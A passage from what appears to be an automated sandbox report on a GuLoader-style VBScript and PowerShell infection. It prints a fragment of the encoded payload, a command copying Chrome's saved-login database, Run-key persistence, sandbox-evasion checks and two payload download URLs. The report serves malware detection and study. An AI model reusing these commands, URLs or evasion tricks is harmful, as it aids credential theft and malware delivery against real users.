CwASQBuAHQAUAB0AHIAIABSAGEAcwBrAG8AOAAyACwAcgBlAGYAIABJAG4AdAAzADIAIABSAGEAcwBrAG8AOAAzACwAaQBuAHQAIABSAGEAcwBrAG8AOAA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABSAGEAcwBrAG8AOAA1ACwAaQBuAHQAIABSAGEAcwBrAG8AOAA2ACwAaQBuAHQAIABSAGEAcwBrAG8AOAA3ACwAaQBuAHQAIABSAGEAcwBrAG8AOAA4ACwAaQBuAHQAIABSAGEAcwBrAG8AOAA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEgAdQB0AHUANwAgAGcAYQByAGEAbgAgAGQAeQBzAGMAaAAgAFUATgBVAE4ASQAgAFMAdABvAHIAIABPAFYARQBSAEkATgAgAGwAaQBmAHQAbQBhACAARQBsAGUAYwB0AHIAbwBkAGkAIABJAHIAcgBpAHQAZQByAGUAdAA0ACAAQgBvAG4AaQBuAGkAdABlADcAIABlAGMAZAB5AHMAbwBuAGEAbgAgAHMAaABhAHIAIABLAGEAcgBhAG4AdABuAGUAcwB0ACAAYgByAHUAdAB0AG8AIABhAG4AdAByAGEAYwBpACAARgB5AHIAbQBlACAATABhAHUAZAByAHUAcAB0AHIAaQA2ACAAZABlAHMAcABvAHQAaQB6ACAAVABlAG0AcABlAGwAawAgAFIAZQB0AHMAcwBpAGsAIABkAGUAbQBvAHUAZABnAGEAdgBlACAAVABBAEMAVABVACAATwBiAGoAdQAgAEwAVQBEAEkAQwBSAE8AVQBTAEMAIABzAHQAdQBtACAAVJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5wwhq3bl\5wwhq3bl.cmdlineJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exeJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4377.tmp" "c:\Users\user\AppData\Local\Temp\5wwhq3bl\CSCEED551C9B69E4D3BACB27851B833AAE.TMP"Jump to behavior
      Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe "C:\Program Files (x86)\internet explorer\ieinstal.exe" Jump to behavior
      Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe "C:\Program Files (x86)\internet explorer\ieinstal.exe" Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /VJump to behavior
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
      Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\Champag6.datJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5684:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6900:120:WilError_01
      Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Users\user\AppData\Roaming\K-NBS4VB\K-Nlogri.iniJump to behavior
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
      Source: Binary string: ieinstal.pdbGCTL source: svchost.exe, 0000001A.00000002.875332208.000000000392F000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 0000001A.00000002.874340657.0000000002E12000.00000004.00000001.00020000.00000000.sdmp
      Source: Binary string: ieinstal.pdb source: svchost.exe, 0000001A.00000002.875332208.000000000392F000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 0000001A.00000002.874340657.0000000002E12000.00000004.00000001.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdbUGP source: ieinstal.exe, 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, ieinstal.exe, 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000001A.00000003.731672310.0000000003200000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000003.729304161.0000000003000000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.874979162.000000000351F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.874833482.0000000003400000.00000040.00000800.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: ieinstal.exe, ieinstal.exe, 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, ieinstal.exe, 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, svchost.exe, 0000001A.00000003.731672310.0000000003200000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000003.729304161.0000000003000000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.874979162.000000000351F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.874833482.0000000003400000.00000040.00000800.00020000.00000000.sdmp
      Source: Binary string: svchost.pdb source: ieinstal.exe, 00000017.00000003.728221731.0000000002F07000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000017.00000002.741936624.000000001EAA0000.00000040.10000000.00040000.00000000.sdmp, ieinstal.exe, 00000017.00000003.728303049.0000000002EC3000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: svchost.pdbUGP source: ieinstal.exe, 00000017.00000003.728221731.0000000002F07000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000017.00000002.741936624.000000001EAA0000.00000040.10000000.00040000.00000000.sdmp, ieinstal.exe, 00000017.00000003.728303049.0000000002EC3000.00000004.00000020.00020000.00000000.sdmp

      Data Obfuscation

      barindex
      VBScript performs obfuscated calls to suspicious functions
      Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: ShellExecute("C:\Windows\SysWOW64\WindowsPowerShell\v", " -EncodedCommand "IwBBAEkAUgBFAEQAIABTA", "", "", "0")
      Yara detected GuLoader
      Source: Yara matchFile source: 00000017.00000000.621139519.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_035AB910 push esp; retf 4_2_035AB911
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_035A4DBD push eax; ret 4_2_035A4DC3
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1ECAD0D1 push ecx; ret 23_2_1ECAD0E4
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_0347D0D1 push ecx; ret 26_2_0347D0E4
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_02A163D7 push 00000019h; ret 26_2_02A163DD
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_02A2C883 push 00000038h; retf 26_2_02A2C88F
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_02A2A842 push edx; retf 26_2_02A2A843
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_02A29FB6 push es; iretd 26_2_02A29FBD
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_02A2D4B5 push eax; ret 26_2_02A2D508
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5wwhq3bl\5wwhq3bl.cmdline
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5wwhq3bl\5wwhq3bl.cmdlineJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\5wwhq3bl\5wwhq3bl.dllJump to dropped file
      Source: C:\Windows\SysWOW64\svchost.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run IB1XSLUHG4Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run IB1XSLUHG4Jump to behavior

      Hooking and other Techniques for Hiding and Protection

      barindex
      Modifies the prolog of user mode functions (user mode inline hooks)
      Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x89 0x9E 0xE4
      Source: C:\Windows\System32\wscript.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Tries to detect Any.run
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
      Source: ieinstal.exe, 00000017.00000002.729749422.0000000003110000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Source: ieinstal.exe, 00000017.00000002.729749422.0000000003110000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: USER32NTDLLKERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNSTARTUP KEYHTTPS://WWW.BULKWHATSAPPSENDER.IN/BIN_FLDFMMV154.BINHTTPS://MADECOSMETICS.STORE/BIN_FLDFMMV154.BIN
      Tries to detect virtualization through RDTSC time measurements
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeRDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 0000000002A19904 second address: 0000000002A1990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 0000000002A19B7E second address: 0000000002A19B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Potential evasive VBS script found (sleep loop)
      Source: Initial fileInitial file: For i = 1 To len(h) step 2 if ChrW("&H" & mid(h,i,2)) = "ZZZ" then Wscript.Sleep(1)
